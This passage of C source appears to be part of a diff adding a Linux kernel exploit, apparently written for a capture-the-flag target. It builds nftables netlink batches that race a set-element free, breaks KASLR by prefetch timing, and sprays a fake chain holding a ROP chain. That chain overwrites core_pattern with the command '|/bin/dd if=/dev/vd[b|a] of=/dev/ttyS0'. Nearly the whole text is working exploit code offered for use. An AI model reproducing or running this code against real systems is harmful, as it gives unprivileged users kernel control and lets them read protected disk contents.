NLA_HDRLEN); + h->nlmsg_len = NLMSG_ALIGN(h->nlmsg_len) + np; + b->len = mo + NLMSG_ALIGN(h->nlmsg_len); + return a; +} + +static void nlbuf_nest_end(struct nlbuf *b, struct nlattr *n) { + (void)b; + n->nla_len = (uint16_t)(b->buf + b->len - (uint8_t *)n); +} + +static int nl_u32be(struct nlbuf *b, struct nlmsghdr *h, uint16_t t, uint32_t v) { + v = htonl(v); return nlbuf_put(b, h, t, &v, 4); +} + +static int nl_strz(struct nlbuf *b, struct nlmsghdr *h, uint16_t t, const char *s) { + return nlbuf_put(b, h, t, s, strlen(s) + 1); +} + +/* ========== netlink socket ========== */ +struct nlsock { int fd; uint32_t pid; }; + +static struct nlsock nl_open(void) { + struct nlsock s = {-1, 0}; + int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER); + if (fd < 0) return s; + struct sockaddr_nl sa = {.nl_family = AF_NETLINK}; + if (bind(fd, (void *)&sa, sizeof(sa)) < 0) { close(fd); return s; } + socklen_t sl = sizeof(sa); + getsockname(fd, (void *)&sa, &sl); + s.pid = sa.nl_pid; s.fd = fd; + int bufsz = 8<<20; + setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + int fl = fcntl(fd, F_GETFL, 0); + if (fl >= 0) fcntl(fd, F_SETFL, fl | O_NONBLOCK); + return s; +} + +static int nl_send(int fd, const void *buf, size_t len) { + struct sockaddr_nl sa = {.nl_family = AF_NETLINK}; + struct iovec iov = {(void *)buf, len}; + struct msghdr msg = {&sa, sizeof(sa), &iov, 1, NULL, 0, 0}; + return sendmsg(fd, &msg, 0) < 0 ? 
-1 : 0; +} + +static int nl_drain(int fd) { + uint8_t buf[16384]; + for (;;) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r <= 0) break; + } + return 0; +} + +static int nl_wait_acks(int fd, int n, int tmo_ms) { + struct timespec start, now; + clock_gettime(CLOCK_MONOTONIC, &start); + int seen = 0, last = 0; + uint8_t buf[16384]; + while (seen < n) { + ssize_t r = recv(fd, buf, sizeof(buf), MSG_DONTWAIT); + if (r > 0) { + int rem = r; + for (struct nlmsghdr *h = (void *)buf; NLMSG_OK(h, rem); h = NLMSG_NEXT(h, rem)) { + if (h->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = NLMSG_DATA(h); + seen++; last = e->error; + } + } + } + clock_gettime(CLOCK_MONOTONIC, &now); + long ms = (now.tv_sec-start.tv_sec)*1000 + (now.tv_nsec-start.tv_nsec)/1000000; + if (ms > tmo_ms) return -ETIMEDOUT; + if (r <= 0) { struct timespec sl = {0, 500000}; nanosleep(&sl, NULL); } + } + return last; +} + +/* ========== batch helpers ========== */ +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL) + +static int batch_begin(struct nlbuf *b, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(b, NFNL_MSG_BATCH_BEGIN, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 0 : -1; +} +static int batch_end(struct nlbuf *b, uint32_t seq, uint32_t pid) { + return nlbuf_begin_msg(b, NFNL_MSG_BATCH_END, NLM_F_REQUEST, seq, pid, + NFPROTO_INET, NFNL_SUBSYS_NFTABLES) ? 
0 : -1; +} + +/* ========== namespace setup ========== */ +static void xwrite(const char *p, const char *s) { + int fd = open(p, O_WRONLY|O_CLOEXEC); + if (fd < 0) die(p); + write(fd, s, strlen(s)); close(fd); +} + +static void setup_ns(void) { + uid_t u = getuid(); gid_t g = getgid(); + if (u == 0) { + setresgid(1000,1000,1000); setresuid(1000,1000,1000); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + u = getuid(); g = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(USER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1\n", u); xwrite("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1\n", g); xwrite("/proc/self/gid_map", m); + setresgid(0,0,0); setresuid(0,0,0); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NET)"); + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd >= 0) { + struct ifreq ifr = {0}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP|IFF_RUNNING; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + } +} + +/* forward declaration for pin_cpu (defined later, used by entrybleed) */ +static void pin_cpu(int cpu); + +/* ========== KASLR bypass (prefetch timing, adapted from Hc0wl/CVE-2026-23074) ========== */ +#ifdef __x86_64__ + +/* + * Timing primitives from IAIK/prefetch + Hc0wl's kaslr_bypass.c. + * Key difference from standard EntryBleed: uses mfence+RDTSCP (not lfence+RDTSC) + * and prefetchnta+prefetcht2 (not prefetcht0). Works on Intel Sapphire Rapids. 
+ */ +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static uint64_t time_prefetch(const void *p, int n) { + uint64_t best = ~0ULL; + for (int i = 0; i < n; i++) { + uint64_t t1 = rdtsc_begin(); + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r"(p)); + uint64_t delta = rdtsc_end() - t1; + if (delta < best) best = delta; + } + return best; +} + +/* Cluster analysis: extract top clusters from raw measurements. + * Groups values within `window` of each other, picks clusters by size. */ +static void eb_cluster_extract(uint64_t *raw, int n, uint64_t *out, int *nout, + int max_out, uint64_t window) { + int used[32] = {0}; + if (n > 32) n = 32; /* used[] tracks at most 32 samples */ + *nout = 0; + while (*nout < max_out) { + uint64_t best_c = 0; + int best_n = 0; + for (int i = 0; i < n; i++) { + if (used[i]) continue; + int cnt = 0; + for (int j = 0; j < n; j++) { + if (used[j]) continue; + uint64_t d = raw[i] > raw[j] ? raw[i]-raw[j] : raw[j]-raw[i]; + if (d <= window) cnt++; + } + if (cnt > best_n) { best_n = cnt; best_c = raw[i]; } + } + if (best_n == 0) break; + out[(*nout)++] = best_c; + printf("[+] cluster[%d]: %#lx (%d/%d)\n", *nout-1, + (unsigned long)best_c, best_n, n); + for (int j = 0; j < n; j++) { + if (!used[j]) { + uint64_t d = best_c > raw[j] ? best_c-raw[j] : raw[j]-best_c; + if (d <= window) used[j] = 1; + } + } + } +} + +/* + * kbase detection: two-phase scan. + * Phase 1: 16MB steps over 1.25GB (as in Hc0wl), find coarse 16MB block. 
+ * Phase 2: 2MB steps within ±16MB of coarse result, find exact 2MB-aligned kbase. + * 7-vote majority per phase, retry until consensus. + */ +static uint64_t detect_kbase(void) { + #define KB_START 0xffffffff81000000ULL + #define KB_END 0xffffffffD0000000ULL + #define KB_COARSE 0x1000000ULL /* 16MB */ + #define KB_FINE 0x200000ULL /* 2MB */ + #define KB_VOTES 7 + + /* Phase 1: coarse scan (16MB steps) */ + printf("[*] kbase: coarse scan (16MB steps, %d votes)...\n", KB_VOTES); + uint64_t coarse = KB_START; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + int naddr = (int)((KB_END - KB_START) / KB_COARSE); + uint64_t best_t = ~0ULL, best_a = KB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = KB_START + KB_COARSE * (uint64_t)ti; + uint64_t t = time_prefetch((void *)addr, 16); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + /* Boyer-Moore majority vote */ + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] kbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { coarse = cand; break; } + printf("[*] kbase: retrying coarse scan...\n"); + } + + /* Phase 2: fine scan (2MB steps around coarse result) */ + printf("[*] kbase: fine scan (2MB steps around %#lx)...\n", + (unsigned long)coarse); + uint64_t fine_start = (coarse > KB_START + KB_COARSE) ? 
+ coarse - KB_COARSE : KB_START; + uint64_t fine_end = coarse + 2 * KB_COARSE; + if (fine_end > KB_END) fine_end = KB_END; + + uint64_t result = coarse; + for (int attempt = 0; attempt < 3; attempt++) { + uint64_t votes[KB_VOTES]; + for (int v = 0; v < KB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += KB_FINE) { + uint64_t t = time_prefetch((void *)addr, 32); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < KB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < KB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] kbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, KB_VOTES); + + if (cnt > KB_VOTES / 2) { result = cand; break; } + } + + return result; +} + +/* + * phbase detection: two-phase scan over direct map range. + * CONFIG_RANDOMIZE_MEMORY can shift page_offset_base by up to ~8TB. + * Phase 1: 256GB coarse steps over 16TB → find ~256GB region. + * Phase 2: 1GB fine steps within ±128GB → find exact 1GB-aligned base. 
+ */ +static uint64_t detect_phbase(void) { + #define PB_START 0xffff888000000000ULL + #define PB_COARSE 0x4000000000ULL /* 256GB */ + #define PB_CRANGE 0x100000000000ULL /* 16TB coarse range */ + #define PB_STEP 0x40000000ULL /* 1GB */ + #define PB_VOTES 7 + + /* Phase 1: coarse scan (256GB steps over 16TB) = 64 addresses per vote */ + printf("[*] phbase: coarse scan (256GB steps, 16TB range, %d votes)...\n", PB_VOTES); + uint64_t coarse = PB_START; + for (int attempt = 0; attempt < 10; attempt++) { + uint64_t votes[PB_VOTES]; + int naddr = (int)(PB_CRANGE / PB_COARSE); /* 64 */ + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = PB_START; + for (int ti = 0; ti < naddr; ti++) { + uint64_t addr = PB_START + PB_COARSE * (uint64_t)ti; + uint64_t t = time_prefetch((void *)addr, 40); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] phbase coarse: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { coarse = cand; break; } + if (attempt < 9) printf("[*] phbase: retrying coarse...\n"); + } + + /* Phase 2: fine scan (1GB steps, coarse-128GB..coarse+384GB: + * the 256GB coarse block widened by 128GB on each side) = 512 addrs */ + uint64_t fine_start = (coarse > PB_START + PB_COARSE/2) ? 
+ coarse - PB_COARSE/2 : PB_START; + uint64_t fine_end = coarse + PB_COARSE + PB_COARSE/2; + printf("[*] phbase: fine scan (1GB steps, %#lx-%#lx)...\n", + (unsigned long)fine_start, (unsigned long)fine_end); + + uint64_t result = coarse; + for (int attempt = 0; attempt < 5; attempt++) { + uint64_t votes[PB_VOTES]; + for (int v = 0; v < PB_VOTES; v++) { + uint64_t best_t = ~0ULL, best_a = coarse; + for (uint64_t addr = fine_start; addr < fine_end; addr += PB_STEP) { + uint64_t t = time_prefetch((void *)addr, 40); + if (t < best_t) { best_t = t; best_a = addr; } + } + votes[v] = best_a; + } + + uint64_t cand = votes[0]; int cnt = 1; + for (int i = 1; i < PB_VOTES; i++) { + if (cnt == 0) { cand = votes[i]; cnt = 1; } + else if (votes[i] == cand) cnt++; + else cnt--; + } + cnt = 0; + for (int i = 0; i < PB_VOTES; i++) if (votes[i] == cand) cnt++; + + printf("[*] phbase fine: %#lx (%d/%d)\n", + (unsigned long)cand, cnt, PB_VOTES); + if (cnt > PB_VOTES / 2) { result = cand; break; } + } + + /* Apply -4GB KVM correction if result is above default + 4GB */ + if (result > PB_START + 0x100000000ULL) { + uint64_t corrected = result - 0x100000000ULL; + printf("[+] phbase KVM corrected: %#lx -> %#lx\n", + (unsigned long)result, (unsigned long)corrected); + result = corrected; + } + + return result; +} + +static void do_entrybleed(void) { + pin_cpu(0); + + /* Detect kbase */ + uint64_t kb = detect_kbase(); + eb_kbases[0] = kb; eb_nkb = 1; + kbase = kb; + printf("[+] kbase=%#lx\n", (unsigned long)kbase); + + /* Also store the coarse result ±16MB as alternative candidates */ + if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb - KB_COARSE; + if (eb_nkb < MAX_EB_CANDS) eb_kbases[eb_nkb++] = kb + KB_COARSE; + + /* Skip phbase detection — not needed for __init_begin approach. + * The fake chain lives at kbase + OFF_INIT_BEGIN + offset, + * which is kbase-relative and doesn't need phbase. 
*/ + phbase = 0xffff888000000000ULL; /* placeholder for pagemap fallback only */ + eb_phbases[0] = phbase; eb_npb = 1; +} +#else +static void do_entrybleed(void) { die("x86_64 only"); } +#endif + +/* ========== physmap (MAP_SHARED for post-fork updates) ========== */ +static void physmap_spray(void) { + size_t sz = (size_t)physmap_mb << 20; + phys_region = mmap(NULL, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +static uint64_t read_physmap_kva(void) { + int fd = open("/proc/self/pagemap", O_RDONLY); + if (fd < 0) return 0; + uint64_t entry = 0; + pread(fd, &entry, 8, (off_t)((uint64_t)phys_region / 4096) * 8); + close(fd); + if (!(entry & (1ULL << 63))) return 0; + uint64_t pfn = entry & ((1ULL << 55) - 1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Fill every physmap page with the ROP blob. + * + * Page layout (4096 bytes): + * +0x000: Fake nft_chain (96 bytes) + * +0: blob_gen_0 = page_kva + 0x80 + * +8: blob_gen_1 = page_kva + 0x80 + * +64: table = kbase (safe readable address) + * +80: use = 1 + * +84: flags = 0 + * +88: name = page_kva + 0x1C0 + * +0x080: Fake nft_rule_blob + * +0: size = 0x90 (covers rules + terminator = 144 bytes) + * +8: rule_dp: dlen=128, is_last=0 (value 0x100) + * +16: expr[0] (32B): dreg=130, [pop_rsi, src_va] -> return addr + * +48: expr[1] (32B): dreg=134, [pop_rdi, core_pattern] + * +80: expr[2] (32B): dreg=138, [strcpy, pop_rdi] + * +112: expr[3] (32B): dreg=142, [0x7FFFFFFF, msleep] + * +144: terminator rule_dp: is_last=1 + * +0x1C0: Name string "x\0" + * +0x200: Payload string "|/bin/dd if=/dev/vd[b|a] of=/dev/ttyS0\0" + * + * nft_do_chain stack layout (6.1.155, sub $0x220,%rsp): + * regs at rsp+0x48 + * canary at rsp+0x218 + * saved regs at rsp+0x220..0x248 + * return address at rsp+0x250 + * dreg=130 -> rsp+0x48+130*4 = rsp+0x250 = return addr + * 
dreg=134 -> rsp+0x260 + * dreg=138 -> rsp+0x270 + * dreg=142 -> rsp+0x280 + * + * ROP chain (4 expressions, 32 bytes each): + * expr[0] dreg=130 dlen=16: pop_rsi_rdi | src_va -> enter pop_rsi;pop_rdi;ret + * expr[1] dreg=134 dlen=16: core_pattern| strcpy -> RDI=core_pattern, ret→strcpy + * expr[2] dreg=138 dlen=16: pop_rdi | 0x7FFFFFFF -> RDI=sleep_ms + * expr[3] dreg=142 dlen=16: msleep | 0 -> park thread + */ +static void physmap_fill_rop(void) { + uint64_t nft_imm_ops = kbase + OFF_NFT_IMM_OPS; + uint64_t core_pattern = kbase + OFF_CORE_PATTERN; + uint64_t pop_rdi = kbase + OFF_POP_RDI; + uint64_t pop_rsi_rdi = kbase + OFF_POP_RSI_RDI; + uint64_t strcpy_va = kbase + OFF_STRCPY; + uint64_t msleep_va = kbase + OFF_MSLEEP; + uint64_t src_va = g_page_kva + PATH_OFFSET; + + uint8_t page[4096]; + memset(page, 0, sizeof(page)); + + /* ---- Fake nft_chain at page+0 ---- */ + uint64_t blob_ptr = g_page_kva + BLOB_OFFSET; + memcpy(page + CHAIN_OFF_BLOB0, &blob_ptr, 8); + memcpy(page + CHAIN_OFF_BLOB1, &blob_ptr, 8); + uint64_t tbl = kbase; + memcpy(page + CHAIN_OFF_TABLE, &tbl, 8); + uint32_t use = 1; + memcpy(page + CHAIN_OFF_USE, &use, 4); + page[CHAIN_OFF_FLAGS] = 0; + uint64_t name_ptr = g_page_kva + NAME_OFFSET; + memcpy(page + CHAIN_OFF_NAME, &name_ptr, 8); + + /* ---- Name string at page+0x1C0 ---- */ + page[NAME_OFFSET] = 'x'; page[NAME_OFFSET+1] = 0; + + /* ---- Payload string at page+0x200 ---- */ + char payload[64]; + const char *flag_dev = pick_flag_device(); + int n = snprintf(payload, sizeof(payload), + "|/bin/dd if=%s of=/dev/ttyS0", flag_dev); + if (n < 0 || (size_t)n >= sizeof(payload)) + die("snprintf core_pattern payload"); + printf("[*] core_pattern payload device: %s\n", flag_dev); + memcpy(page + PATH_OFFSET, payload, strlen(payload) + 1); + + /* ---- Fake nft_rule_blob at page+0x80 ---- */ + uint8_t *blob = page + BLOB_OFFSET; + + /* blob->size: must cover data section (rule_dp + 4 exprs + terminator) + * = 8 + 4*32 + 8 = 144 = 0x90 */ + uint64_t 
blob_size = 0x90; + memcpy(blob, &blob_size, 8); + + /* First rule_dp: dlen=128, is_last=0 -> value = 128<<1 | 0 = 0x100 */ + uint64_t rdp = 0x100; + memcpy(blob + 8, &rdp, 8); + + /* + * 4 nft_immediate expressions, 32 bytes each (8B ops + 24B private data): + * ops->size = 0x20 = 32 -> this IS the total expression stride + * +0x00: ops pointer (8 bytes) -> nft_imm_ops + * +0x08: data[0:8] = first ROP qword + * +0x10: data[8:16] = second ROP qword + * +0x18: dreg (u8) + * +0x19: dlen (u8) + * +0x1A-0x1F: padding (6 bytes) + * + * No NFT_CONTINUE expression needed: the kernel sets + * regs.verdict.code = NFT_CONTINUE at the start of each rule. + */ + + /* Expression 0 at blob+16 (dreg=130): pop_rsi_rdi | src_va + * ROP: ret addr → pop_rsi_rdi, pops src_va into RSI */ + uint8_t *e = blob + 16; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = pop_rsi_rdi; + *(uint64_t *)(e + 16) = src_va; + e[24] = 130; e[25] = 16; + + /* Expression 1 at blob+48 (dreg=134): core_pattern | strcpy + * ROP: pop_rdi gets core_pattern into RDI, return_thunk → strcpy */ + e = blob + 48; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = core_pattern; + *(uint64_t *)(e + 16) = strcpy_va; + e[24] = 134; e[25] = 16; + + /* Expression 2 at blob+80 (dreg=138): pop_rdi | 0x7FFFFFFF + * ROP: strcpy returns → pop_rdi, pops 0x7FFFFFFF into RDI */ + e = blob + 80; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = pop_rdi; + *(uint64_t *)(e + 16) = 0x7FFFFFFFULL; + e[24] = 138; e[25] = 16; + + /* Expression 3 at blob+112 (dreg=142): msleep | 0 + * ROP: pop_rdi returns → msleep(0x7FFFFFFF), parks thread */ + e = blob + 112; + memcpy(e, &nft_imm_ops, 8); + *(uint64_t *)(e + 8) = msleep_va; + *(uint64_t *)(e + 16) = 0; + e[24] = 142; e[25] = 16; + + /* Terminator rule_dp at blob+144: is_last=1 */ + uint64_t term = 1; + memcpy(blob + 144, &term, 8); + + /* Fill all physmap pages */ + size_t sz = (size_t)physmap_mb << 20; + for (size_t o = 0; o < sz; o += 4096) + memcpy((uint8_t 
*)phys_region + o, page, sizeof(page)); + printf("[+] physmap filled with ROP chain (kva=%#lx)\n", + (unsigned long)g_page_kva); +} + +/* ========== in-batch spray: NEWTABLE userdata for kmalloc-cg-64 ========== */ +/* + * Build spray userdata (52 bytes) that overlays a freed nft_hash_elem. + * When kmemdup copies this into the reclaimed slot, the reader's stale + * ext pointer will find a valid element with NFT_GOTO(physmap_chain). + * + * Object layout (kmalloc-cg-64, element with key_len=4 verdict map): + * +0: hlist_node.next (8B) - reader already past this + * +8: hlist_node.pprev (8B) - reader already past this + * +16: ext.genmask (1B) = 0 (active) + * +17: ext.offset[KEY] (1B) = 16 (KEY at ext+16 = obj+32) + * +18: ext.offset[1] (1B) = 0 + * +19: ext.offset[DATA] (1B) = 20 (DATA at ext+20 = obj+36) + * +32: KEY data (4B) = htonl(KEY_RACE) + * +36: verdict.code (4B) = NFT_GOTO + * +40: verdict padding (4B) = 0 + * +44: verdict.chain (8B) = physmap fake chain KVA + */ +static void build_spray_udata(uint8_t udata[SPRAY_UDATA_LEN], uint64_t chain_kva) { + memset(udata, 0, SPRAY_UDATA_LEN); + udata[16] = 0; /* ext.genmask = 0 (active in current generation) */ + udata[17] = 16; /* ext.offset[KEY] = 16 */ + udata[19] = 20; /* ext.offset[DATA] = 20 */ + *(uint32_t *)(udata + 32) = htonl(KEY_RACE); + *(uint32_t *)(udata + 36) = NFT_GOTO_CODE; + *(uint64_t *)(udata + 44) = chain_kva; +} + +/* ========== nft object creation ========== */ +static int nft_setup_all(int fd, uint32_t pid) { + uint8_t buf[65536]; + struct nlbuf b; + nlbuf_init(&b, buf, sizeof(buf)); + uint32_t seq = 1; + + batch_begin(&b, seq++, pid); + + /* 1. Table */ + struct nlmsghdr *h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWTABLE), NLC, + seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_TABLE_NAME, "t"); + + /* 2. 
Base chain (LOCAL_OUT hook) */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWCHAIN), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_CHAIN_TABLE, "t"); + nl_strz(&b, h, NFTA_CHAIN_NAME, "bc"); + struct nlattr *hk = nlbuf_nest_start(&b, h, NFTA_CHAIN_HOOK); + nl_u32be(&b, h, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nl_u32be(&b, h, NFTA_HOOK_PRIORITY, (uint32_t)NF_IP_PRI_FILTER); + nlbuf_nest_end(&b, hk); + + /* 3. Verdict map (hash, size=1, key_len=4) */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWSET), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_SET_TABLE, "t"); + nl_strz(&b, h, NFTA_SET_NAME, "vm"); + nl_u32be(&b, h, NFTA_SET_FLAGS, NFT_SET_MAP); + nl_u32be(&b, h, NFTA_SET_KEY_LEN, 4); + nl_u32be(&b, h, NFTA_SET_DATA_TYPE, 0xffffff00u); + nl_u32be(&b, h, NFTA_SET_DATA_LEN, 16); + nl_u32be(&b, h, NFTA_SET_ID, 99); + nl_u32be(&b, h, NFTA_SET_POLICY, NFT_SET_POL_PERFORMANCE); + struct nlattr *desc = nlbuf_nest_start(&b, h, NFTA_SET_DESC); + nl_u32be(&b, h, NFTA_SET_DESC_SIZE, 1); + nlbuf_nest_end(&b, desc); + + /* 4. Fill element: key=0, verdict=NF_ACCEPT */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&b, h, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_KEY); + uint32_t kf = htonl(KEY_FILL); + nlbuf_put(&b, h, NFTA_DATA_VALUE, &kf, 4); + nlbuf_nest_end(&b, kn); + struct nlattr *dn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_DATA); + struct nlattr *vn = nlbuf_nest_start(&b, h, NFTA_DATA_VERDICT); + nl_u32be(&b, h, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&b, vn); + nlbuf_nest_end(&b, dn); + nlbuf_nest_end(&b, el); + nlbuf_nest_end(&b, els); + + /* 5. 
Rule: immediate(KEY_RACE) + lookup(vm) */ + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWRULE), NLC, seq++, pid, NFPROTO_INET, 0); + nl_strz(&b, h, NFTA_RULE_TABLE, "t"); + nl_strz(&b, h, NFTA_RULE_CHAIN, "bc"); + struct nlattr *exs = nlbuf_nest_start(&b, h, NFTA_RULE_EXPRESSIONS); + { + struct nlattr *e = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + nl_strz(&b, h, NFTA_EXPR_NAME, "immediate"); + struct nlattr *ed = nlbuf_nest_start(&b, h, NFTA_EXPR_DATA); + nl_u32be(&b, h, NFTA_IMMEDIATE_DREG, NFT_REG32_00); + struct nlattr *id = nlbuf_nest_start(&b, h, NFTA_IMMEDIATE_DATA); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&b, h, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&b, id); + nlbuf_nest_end(&b, ed); + nlbuf_nest_end(&b, e); + } + { + struct nlattr *e = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + nl_strz(&b, h, NFTA_EXPR_NAME, "lookup"); + struct nlattr *ed = nlbuf_nest_start(&b, h, NFTA_EXPR_DATA); + nl_strz(&b, h, NFTA_LOOKUP_SET, "vm"); + nl_u32be(&b, h, NFTA_LOOKUP_SREG, NFT_REG32_00); + nl_u32be(&b, h, NFTA_LOOKUP_DREG, NFT_REG_VERDICT); + nlbuf_nest_end(&b, ed); + nlbuf_nest_end(&b, e); + } + nlbuf_nest_end(&b, exs); + + batch_end(&b, seq++, pid); + + if (nl_send(fd, b.buf, b.len) < 0) return -1; + return nl_wait_acks(fd, 5, 5000); +} + +/* ========== build race batch: NEWSETELEM + NEWTABLE spray interleaved ========== */ +/* + * Each iteration: NEWSETELEM triggers insert→cap_fail→remove→kfree (slot freed), + * then NEWTABLE with userdata does kmalloc(52, GFP_KERNEL_ACCOUNT) → reclaims + * the freed slot via SLUB LIFO on the same CPU → kmemdup writes spray data. + * + * The batch will be auto-aborted (NFNL_BATCH_FAILURE from -ENOSPC on the + * NEWSETELEM messages), so all spray tables + userdata are freed afterwards. + * Same table names ("s000".."s063") are reusable every batch. 
+ */ +static int build_race_batch(uint8_t *buf, size_t cap, uint32_t *seq, + uint32_t pid, int count, + const uint8_t *spray_udata) { + struct nlbuf b; + nlbuf_init(&b, buf, cap); + batch_begin(&b, (*seq)++, pid); + + char tname[8]; + for (int i = 0; i < count; i++) { + /* NEWSETELEM: insert element with KEY_RACE → err_set_full → kfree */ + struct nlmsghdr *h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWSETELEM), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_INET, 0); + if (!h) break; + nl_strz(&b, h, NFTA_SET_ELEM_LIST_TABLE, "t"); + nl_strz(&b, h, NFTA_SET_ELEM_LIST_SET, "vm"); + struct nlattr *els = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_LIST_ELEMENTS); + struct nlattr *el = nlbuf_nest_start(&b, h, NFTA_LIST_ELEM); + struct nlattr *kn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_KEY); + uint32_t kr = htonl(KEY_RACE); + nlbuf_put(&b, h, NFTA_DATA_VALUE, &kr, 4); + nlbuf_nest_end(&b, kn); + struct nlattr *dn = nlbuf_nest_start(&b, h, NFTA_SET_ELEM_DATA); + struct nlattr *vvn = nlbuf_nest_start(&b, h, NFTA_DATA_VERDICT); + nl_u32be(&b, h, NFTA_VERDICT_CODE, NF_ACCEPT); + nlbuf_nest_end(&b, vvn); + nlbuf_nest_end(&b, dn); + nlbuf_nest_end(&b, el); + nlbuf_nest_end(&b, els); + + /* NEWTABLE: spray userdata into kmalloc-cg-64 to reclaim freed slot. + * Uses NFPROTO_IPV4 family to avoid interfering with our INET table. 
